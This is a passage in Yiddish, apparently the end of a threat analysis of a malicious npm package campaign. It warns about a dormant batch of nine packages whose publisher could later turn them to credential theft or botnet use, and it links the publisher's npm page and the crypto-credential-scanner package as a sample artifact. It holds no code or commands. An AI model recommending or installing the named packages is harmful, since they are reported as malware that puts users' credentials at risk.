די שלאָפֿנדיקע וואַריאַנט-C טראַנש איז דער טייל פֿון דער געשיכטע וואָס ווערט ערגסט אַלט. ניין פּאַקעטן מיט אַ ריינעם אינסטאַל פּראָפֿיל און אַן אײַנגעוואָרצלטן פֿאַרלעגער זענען פּונקט די סאָרט אינווענטאַר וואָס אַן אָפּעראַטאָר האַלט אין רעזערוו. אויב זיי דעטאָנירן שפּעטער — ווי PhantomBot האָט געטאָן ווען זײַן אַקסאָיס-יוטילס איבערפּאַקן איבערגעדרייט פון קרעדענשאַל גנייווע צו אַ באָטנעט רעקרוט — זיי וועלן דעטאָנירן קעגן יעדן רעגיסטרי קאָנסומער וואָס האָט געפּינט אַ וואַריאַנט-C פּאַקעט צווישן היינט און די אַראָפּנעמונג. פּינינג אַ בייזוויליקן פּאַקעט לויט ווערסיע באַשיצט אײַך נישט פון אַ פאַרלעגער וואָס קאָנטראָלירט יעדע ווערסיע.
רעפֿערענצן
- [npm ארויסגעבער בלאַט פֿאַר ddjidd5640](https://www.npmjs.com/~ddjidd5640) — 22 פּעקלעך איצט ליסטעד אונטער דעם חשבון. אויטאָריטאַטיווע מקור פֿאַר דעם קאַטאַלאָג אין דער צייט פון שרייבן.
- [npm פּעקל בלאַט פֿאַר קריפּטאָ-קרעדענשאַל-סקאַנער](https://www.npmjs.com/package/crypto-credential-scanner) — ביישפּיל וואַריאַנט-A אַרטיפאַקט; README, ווערסיע געשיכטע, און מחבר לינקס זענען דאָ קענטיק.




